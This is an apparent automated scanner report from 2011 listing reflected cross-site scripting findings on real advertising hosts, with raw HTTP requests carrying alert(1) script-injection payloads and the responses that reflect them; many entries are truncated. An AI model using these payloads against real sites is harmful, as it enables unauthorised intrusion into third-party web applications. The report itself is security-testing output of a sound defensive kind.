HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7329 Date: Sat, 17 Sep 2011 16:25:27 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... age="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj6c87f'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7367 Date: Sat, 17 Sep 2011 16:48:08 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='121773f9380f32f' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7367 Date: Sat, 17 Sep 2011 16:48:09 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='121773f9380f32f' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7367 Date: Sat, 17 Sep 2011 16:48:10 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='121773f9380f32f' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7347 Date: Sat, 17 Sep 2011 16:48:05 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='121773f9380f32f' ...[SNIP]... ollectiveMedia.creat ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadjbaef0'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7332 Date: Sat, 17 Sep 2011 16:49:32 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='';function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7332 Date: Sat, 17 Sep 2011 16:49:32 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='';function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7332 Date: Sat, 17 Sep 2011 16:49:33 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='';function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7314 Date: Sat, 17 Sep 2011 16:49:27 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='';function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... age="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj54ba1'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7363 Date: Sat, 17 Sep 2011 16:23:43 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7363 Date: Sat, 17 Sep 2011 16:23:45 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7363 Date: Sat, 17 Sep 2011 16:23:45 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7342 Date: Sat, 17 Sep 2011 16:23:40 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... pt">CollectiveMedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /iframe!t=1089! |
GET /iframe!t=1089!?ct=US&st Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=OPTOUT |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:48 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIWB4rEAAAAAGw Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:43:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... 4359;;~aopt=0/ff/34/ff; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /iframe!t=1089! |
GET /iframe!t=1089!?ct=US&st Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=OPTOUT |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:47 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIWB4rDAAAAAGo Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:43:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... 4359;;~aopt=0/ff/34/ff; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /iframe!t=1089! |
GET /iframe!t=1089!?ct=US&st Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=OPTOUT |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:43:52 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... 359;;~aopt=0/ff/34/ff; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /iframe!t=1089! |
GET /iframe!t=1089!?ct=US&st Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=OPTOUT |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:43:52 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... 359;;~aopt=0/ff/34/ff; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adnxs.revsci.net |
Path: | /imp |
GET /imp?Z=728x90d8f31'-alert(1)- Host: adnxs.revsci.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=optout |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:27 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:24:27 GMT Content-Length: 468 document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adnxs.revsci.net |
Path: | /imp |
GET /imp?Z=728x90&s=9374993216d'-alert(1)- Host: adnxs.revsci.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=optout |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:44 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:24:44 GMT Content-Length: 468 document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.adbrite.com |
Path: | /adserver/vdi/762701 |
GET /adserver/vdi/762701ee6a5<script>alert(1)< Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.gather.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache="168296542x0.096 |
HTTP/1.1 400 Bad Request Accept-Ranges: none Date: Sat, 17 Sep 2011 16:35:32 GMT Server: XPEHb/1.0 Content-Length: 78 Unsupported URL: /adserver/vdi/762701ee6a5<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /ag.asp |
GET /ag.asp?cc=504f7"><script>alert(1)< Host: adsfac.us Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FSESE002=fpt=0%2C310408 |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 365 Content-Type: text/html Expires: Sat, 17 Sep 2011 16:37:26 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FS504f7%22%3E%3Cscript Set-Cookie: FS504f7%22%3E%3Cscript Set-Cookie: UserID=9831083926626 P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Sat, 17 Sep 2011 16:38:26 GMT Connection: close <a href="http://ad.amgdgt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /ag.asp |
GET /ag.asp?cc=ETN002.315724 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FSESE002=fpt=0%2C310408 |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 4241 Content-Type: text/html Expires: Sat, 17 Sep 2011 16:37:34 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSETN002315724=uid Set-Cookie: FSETN002=pctl=315724&pctm Set-Cookie: UserID=9831083926626 P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Sat, 17 Sep 2011 16:38:33 GMT Connection: close <html><head></head><body> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /ag.asp |
GET /ag.asp?cc=ETN002.315724 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FSESE002=fpt=0%2C310408 |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 4271 Content-Type: text/html Expires: Sat, 17 Sep 2011 16:37:33 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSETN002315724=uid Set-Cookie: FSETN002=pctl=315724&pctm Set-Cookie: UserID=9831083926626 P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Sat, 17 Sep 2011 16:38:33 GMT Connection: close <html><head></head><body> ...[SNIP]... <a target="_blank" href="http://ad.amgdgt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/0/4/1/ |
GET /a11bc"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:56 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/a11bc"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/0/4/1/ |
GET /79aaf"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/1/4/1/ |
GET /bff5d"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:30:01 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:30:01 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/1/4/1/ |
GET /b02af"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:30:05 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:30:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/b02af"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/2/4/1/ |
